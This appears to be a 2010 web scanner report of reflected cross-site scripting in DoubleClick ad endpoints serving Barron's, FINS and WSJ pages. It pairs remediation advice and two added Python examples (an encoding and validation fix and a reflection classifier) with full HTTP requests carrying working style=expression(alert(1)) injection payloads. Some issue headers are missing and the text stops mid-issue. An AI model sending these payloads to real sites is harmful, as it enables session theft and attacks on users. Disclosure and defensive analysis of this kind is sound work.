Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message, submit the link to popular web sites that allow content authoring (for example in blog comments), or create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; &quot; &#x27; &#x3D; etc.). Which encoding is sufficient depends on the output context: in this report every reflection lands inside a double-quoted attribute value, so the quote and the = sign are the characters that matter, and encoding only < and > would not help.
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
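The two layers above applied to the kind of request this report covers, as an added example that is not taken from the report or from the ad server's own code (which is not available). The validator's allow-list patterns are assumed from the values visible in the captured requests (sz=263x32, tile=4, ord=2459245924592459); the vulnerable renderer reproduces the concatenation the responses show, and the hardened one rejects unknown or malformed parameters and entity-encodes every non-alphanumeric character of whatever it does echo, so the report's probe can no longer close the quoted href attribute.

```python
import re

# Probe string from the report, URL-decoded (the ad server echoed it verbatim).
PAYLOAD = '47f00"style="x:expression(alert(1))"043a1994120'

# Layer 1: allow-list validation on arrival.  The formats are ASSUMED from the
# values in the captured requests (sz=263x32, tile=4, ord=2459245924592459);
# the real ad server's rules are not on this page.
PARAM_RULES = {
    "sz": re.compile(r"[0-9]{1,4}x[0-9]{1,4}"),
    "tile": re.compile(r"[0-9]{1,3}"),
    "mc": re.compile(r"[0-9]{1,3}"),
    "ord": re.compile(r"[0-9]{1,20}"),
    "!category": re.compile(r"[A-Za-z0-9_]{0,64}"),
}


def validate_param(name, value):
    """True only for a known parameter whose value fully matches its pattern.

    Unknown names are rejected outright, which is what closes the issues on
    'the name of an arbitrarily supplied request parameter'.
    """
    rule = PARAM_RULES.get(name)
    return rule is not None and rule.fullmatch(value) is not None


def encode_for_html_attribute(value):
    """Layer 2: encoding for the HTML attribute-value context.

    Every character outside [A-Za-z0-9] becomes a numeric entity, which covers
    the quote, '=', ':' and parentheses the probe depends on, plus '&' and '<'.
    """
    return "".join(
        ch if (ch.isascii() and ch.isalnum()) else "&#x%X;" % ord(ch)
        for ch in value
    )


CLICK_PREFIX = "http://ad.doubleclick.net/click;"


def render_click_anchor_vulnerable(params):
    """Reproduces the report's behaviour: raw key=value pairs joined into href."""
    query = ";".join("%s=%s" % (k, v) for k, v in params.items())
    return '<a target="_blank" href="%s%s">' % (CLICK_PREFIX, query)


def render_click_anchor_hardened(params, validate=True):
    """Reject anything outside the allow-list, then encode what is echoed.

    validate=False skips layer 1 so the effect of layer 2 on its own can be
    seen; production code keeps both layers.
    """
    if validate:
        for k, v in params.items():
            if not validate_param(k, v):
                raise ValueError("rejected request parameter %r" % k)
    query = ";".join(
        "%s=%s" % (encode_for_html_attribute(k), encode_for_html_attribute(v))
        for k, v in params.items()
    )
    return '<a target="_blank" href="%s%s">' % (CLICK_PREFIX, query)


if __name__ == "__main__":
    print(render_click_anchor_vulnerable({"sz": PAYLOAD}))
    print(render_click_anchor_hardened({"sz": PAYLOAD}, validate=False))
    print(render_click_anchor_hardened({"sz": "263x32", "tile": "4"}))
```

With validation on, the probe never reaches the page at all; with validation off, the encoded href still contains no literal quote, so the probe stays inside the attribute value. That is why both layers are worth keeping: validation is the narrow gate, encoding is the safety net for any path that bypasses it.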
The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47f00"style%3d"x%3aexpression(alert(1))"043a1994120 was submitted in the !category parameter. This input was echoed as 47f00"style="x:expression(alert(1))"043a1994120 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and will not run in other browsers; the injection point itself is browser-independent, however, since the same break-out from the quoted href attribute allows any attribute (for example an event handler such as onmouseover) to be written into the tag.
Request
GET /adi/barrons.com/public_front;!category=;;mc=0;tile=4;sz=263x32;ord=2459245924592459;47f00"style%3d"x%3aexpression(alert(1))"043a1994120 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/home-page
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 06 Nov 2010 16:06:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 607
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/b;231259931;0-0;0;13405531;31977-263/32;31308648/31326524/1;;~okv=;!category=;;mc=0;tile=4;sz=263x32;47f00"style="x:expression(alert(1))"043a1994120;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/pubs/D2/BSW/Microsite_Index.jsp?cds_page_id=53753&cds_mag_code=BSW&cds_response_key=W9EBBBAA"> ...[SNIP]...
The value of the request parameter named 1d915%22style%3d%22x%3aexpression(alert(1))%22023bd0a1937 (a name that is itself one of the report's earlier probe strings, as in issue 1.3 below) is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks: the double quote inside that parameter name has already closed the href attribute, so the parameter's value lands in an unquoted position. The payload e5ec9%20style%3dx%3aexpression(alert(1))%20c4750a0a15d was submitted in this parameter. This input was echoed as e5ec9 style=x:expression(alert(1)) c4750a0a15d in the application's response, where a space-delimited style attribute is sufficient and no quote character is needed.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 06 Nov 2010 17:06:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 656
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/r;231259931;0-0;0;13405531;31977-263/32;31308648/31326524/1;;~okv=;!category=;;mc=0;tile=4;sz=263x32;&1d915"style="x:expression(alert(1))"023bd0a1937=1e5ec9 style=x:expression(alert(1)) c4750a0a15d;~aopt=2/1/a8/1;~sscs=%3fhttps://w1.buysub.com/pubs/D2/BSW/Microsite_Index.jsp?cds_page_id=53753&cds_mag_code=BSW&cds_response_key=W9EBBBAA"> ...[SNIP]...
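A small reflection classifier that reproduces the reasoning behind the issue details above, added here as an example; it is not part of the report and not the scanner's own logic. It URL-decodes a probe, checks whether the probe came back raw or encoded, parses the response with html.parser and reports whether the probe merely added attributes to the <a> tag or added one that executes script. It covers both the quoted case (the !category value, where the probe carries its own quotes) and the unquoted case immediately above (where a space-delimited style=... suffices). Assumptions: the baseline attribute set {target, href} is taken from the clean responses on this page; the response fragment for the a=b probe is constructed, since the page shows only headers for that response; and treating on* handlers as script goes beyond the IE-only expression() the report relied on.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Attributes the ad server's <a> tag carries in the clean responses shown on
# this page (target and href).  ASSUMED baseline: any other attribute on that
# tag was put there by the request.
BASELINE_ATTRS = frozenset({"target", "href"})


class StartTagCollector(HTMLParser):
    """Records every start tag with its attribute list as the parser sees it."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))


def classify_reflection(probe, body, tag="a", baseline=BASELINE_ATTRS):
    """Classify how a URL-encoded probe came back inside an HTML response.

    'not-reflected'         the probe's leading marker is absent
    'reflected-encoded'     the marker is present but the raw metacharacters are not
    'attribute-injection'   the probe added attributes to <tag>, none of which run script
    'script-injection'      an injected attribute is an on* handler or an IE expression()
    'reflected-outside-tag' the raw probe is in the body but not inside a <tag> start tag
    """
    raw = unquote(probe)
    marker = re.match(r"[A-Za-z0-9]+", raw).group(0)  # e.g. the 47f00 prefix
    if marker not in body:
        return "not-reflected"
    if raw not in body:
        return "reflected-encoded"
    parser = StartTagCollector()
    parser.feed(body)
    for name, attrs in parser.tags:
        if name != tag:
            continue
        injected = [(k, v or "") for k, v in attrs if k not in baseline]
        if not injected:
            continue
        for k, v in injected:
            if k.startswith("on") or (k == "style" and "expression(" in v):
                return "script-injection"
        return "attribute-injection"
    return "reflected-outside-tag"


# Probes and <a> tags from the report's responses (click URLs trimmed).
PROBE_QUOTED = '47f00"style%3d"x%3aexpression(alert(1))"043a1994120'
RESPONSE_QUOTED = (
    '<body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/'
    'click;h=v8/3a4a/0/0/%2a/b;231259931;0-0;0;13405531;31977-263/32;'
    '31308648/31326524/1;;~okv=;!category=;;mc=0;tile=4;sz=263x32;'
    '47f00"style="x:expression(alert(1))"043a1994120;~aopt=2/1/ff/1">'
)
PROBE_UNQUOTED = 'e5ec9%20style%3dx%3aexpression(alert(1))%20c4750a0a15d'
RESPONSE_UNQUOTED = (
    '<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/r;'
    '231259931;0-0;0;13405531;31977-263/32;31308648/31326524/1;;~okv=;'
    '!category=;;mc=0;tile=4;sz=263x32;&1d915"style="x:expression(alert(1))"'
    '023bd0a1937=1e5ec9 style=x:expression(alert(1)) c4750a0a15d;~aopt=2/1/a8/1">'
)
# CONSTRUCTED (the page shows only headers for this response): what the
# attribute-only probe f8e8c"%20a%3db%20acaa71c9afa would produce.
PROBE_ATTR_ONLY = 'f8e8c"%20a%3db%20acaa71c9afa'
RESPONSE_ATTR_ONLY = (
    '<a target="_new" href="http://ad.doubleclick.net/click;~okv=;'
    'f8e8c" a=b acaa71c9afa=1;~aopt=2/1/a8/1">'
)
# CONSTRUCTED: the quoted response with its quotes entity-encoded, i.e. what a
# server that applied attribute encoding would return.
RESPONSE_ENCODED = RESPONSE_QUOTED.replace(
    '"style="x:expression(alert(1))"', '&quot;style=&quot;x:expression(alert(1))&quot;'
)

if __name__ == "__main__":
    for probe, body in [(PROBE_QUOTED, RESPONSE_QUOTED), (PROBE_UNQUOTED, RESPONSE_UNQUOTED),
                        (PROBE_ATTR_ONLY, RESPONSE_ATTR_ONLY), (PROBE_QUOTED, RESPONSE_ENCODED)]:
        print(classify_reflection(probe, body))
```

The distinction between 'attribute-injection' and 'script-injection' is the one the report draws between a Firm finding (the a=b probe) and a Certain one: parsing the tag, rather than grepping for the payload, is what tells you whether the reflected text actually became a new attribute of the anchor.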
1.3. http://ad.doubleclick.net/adi/barrons.com/public_front [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/barrons.com/public_front
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d915"style%3d"x%3aexpression(alert(1))"023bd0a1937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1d915"style="x:expression(alert(1))"023bd0a1937 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/barrons.com/public_front;!category=;;mc=0;tile=4;sz=263x32;ord=2459245924592459;&1d915"style%3d"x%3aexpression(alert(1))"023bd0a1937=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/home-page
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 06 Nov 2010 16:06:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 610
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/b;231259931;0-0;0;13405531;31977-263/32;31308648/31326524/1;;~okv=;!category=;;mc=0;tile=4;sz=263x32;&1d915"style="x:expression(alert(1))"023bd0a1937=1;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/pubs/D2/BSW/Microsite_Index.jsp?cds_page_id=53753&cds_mag_code=BSW&cds_response_key=W9EBBBAA"> ...[SNIP]...
1.4. http://ad.doubleclick.net/adi/fins.com/tech [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/fins.com/tech
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9524a"style%3d"x%3aexpression(alert(1))"2cc2cb1b1d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9524a"style="x:expression(alert(1))"2cc2cb1b1d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/fins.com/tech?9524a"style%3d"x%3aexpression(alert(1))"2cc2cb1b1d9=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2920533/626558/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 646
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:12:46 GMT
Expires: Sat, 06 Nov 2010 16:12:46 GMT
Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_new" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/p;230900558;0-0;0;52244699;255-0/0;38800450/38818207/1;;~okv=;9524a"style="x:expression(alert(1))"2cc2cb1b1d9=1;~aopt=2/1/a8/1;~sscs=%3fhttp://it-jobs.fins.com/Technology-Job-Results.aspx?link=FINS_jobs_relatedjobs&SearchType=advanced&Source=content&CompanyId=4461&CompanyName=Microsoft+Corp"> ...[SNIP]...
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbf2d"style%3d"x%3aexpression(alert(1))"7e8ac526757 was submitted in the sz parameter. This input was echoed as dbf2d"style="x:expression(alert(1))"7e8ac526757 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/fins.com/tech;sz=dbf2d"style%3d"x%3aexpression(alert(1))"7e8ac526757 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://it-jobs.fins.com/?reflink=djm_bcu_tech_x140
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 556
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:07:20 GMT
Expires: Sun, 07 Nov 2010 06:07:20 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_new" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/u;231422590;0-0;0;52244699;255-0/0;38961053/38978810/1;;~okv=;sz=dbf2d"style="x:expression(alert(1))"7e8ac526757;~aopt=2/1/ff/1;~sscs=%3fhttp://www.microsoft-careers.com/go/IEB-&-MCB/242064/?utm_campaign=FINSmobile"> ...[SNIP]...
The value of the tn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7d2f"style%3d"x%3aexpression(alert(1))"f406f78a44b was submitted in the tn parameter. This input was echoed as d7d2f"style="x:expression(alert(1))"f406f78a44b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/fins.com/tech;tn=d7d2f"style%3d"x%3aexpression(alert(1))"f406f78a44b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://it-jobs.fins.com/?reflink=djm_bcu_tech_x140
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 519
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:06:14 GMT
Expires: Sun, 07 Nov 2010 06:06:14 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_new" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/u;231259828;0-0;0;52244699;255-0/0;38962299/38980056/1;;~okv=;tn=d7d2f"style="x:expression(alert(1))"f406f78a44b;~aopt=2/1/ff/1;~sscs=%3fhttp://www.technisource.com/search/"> ...[SNIP]...
1.7. http://ad.doubleclick.net/adi/interactive.wsj.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/interactive.wsj.com/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d75b"style%3d"x%3aexpression(alert(1))"6456b4e6ccc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d75b"style="x:expression(alert(1))"6456b4e6ccc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/?7d75b"style%3d"x%3aexpression(alert(1))"6456b4e6ccc=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 456
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:20:51 GMT
Expires: Sun, 07 Nov 2010 09:20:51 GMT
Connection: close
1.8. http://ad.doubleclick.net/adi/interactive.wsj.com/default [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://ad.doubleclick.net
Path: /adi/interactive.wsj.com/default
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8e8c"%20a%3db%20acaa71c9afa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8e8c" a=b acaa71c9afa in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /adi/interactive.wsj.com/default?f8e8c"%20a%3db%20acaa71c9afa=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2920533/626558/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 431
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 03:47:36 GMT
Expires: Sun, 07 Nov 2010 03:47:36 GMT
Connection: close
1.9. http://ad.doubleclick.net/adi/interactive.wsj.com/default [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/interactive.wsj.com/default
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbae"%20style%3dx%3aexpression(alert(1))%20637aa9fb3ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bbae" style=x:expression(alert(1)) 637aa9fb3ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/default?2bbae"%20style%3dx%3aexpression(alert(1))%20637aa9fb3ae=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2920533/626558/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 456
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:12:37 GMT
Expires: Sat, 06 Nov 2010 16:12:37 GMT
Connection: close
1.10. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/interactive.wsj.com/front_nonsub
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61f9c"%20style%3dx%3aexpression(alert(1))%2033eb3ea8620 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61f9c" style=x:expression(alert(1)) 33eb3ea8620 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/front_nonsub?61f9c"%20style%3dx%3aexpression(alert(1))%2033eb3ea8620=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058||t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 457
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 03:07:33 GMT
Expires: Sat, 06 Nov 2010 03:07:33 GMT
Connection: close
The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7c9"%20a%3db%20d834c3558b6 was submitted in the !category parameter. This input was echoed as 3b7c9" a=b d834c3558b6 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /adi/interactive.wsj.com/markets_front;!category=3b7c9"%20a%3db%20d834c3558b6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-financial-markets-stock.html?mod=WSJ_topnav_markets_main
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 440
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 05:59:27 GMT
Expires: Sun, 07 Nov 2010 05:59:27 GMT
1.12. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_front [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/interactive.wsj.com/markets_front
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d558"%20style%3dx%3aexpression(alert(1))%2078f613ce975 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d558" style=x:expression(alert(1)) 78f613ce975 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/markets_front?4d558"%20style%3dx%3aexpression(alert(1))%2078f613ce975=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 457
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:11:05 GMT
Expires: Sat, 06 Nov 2010 16:11:05 GMT
Connection: close
1.13. http://ad.doubleclick.net/adi/interactive.wsj.com/microsite_hsbcemi [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/interactive.wsj.com/microsite_hsbcemi
Issue detail
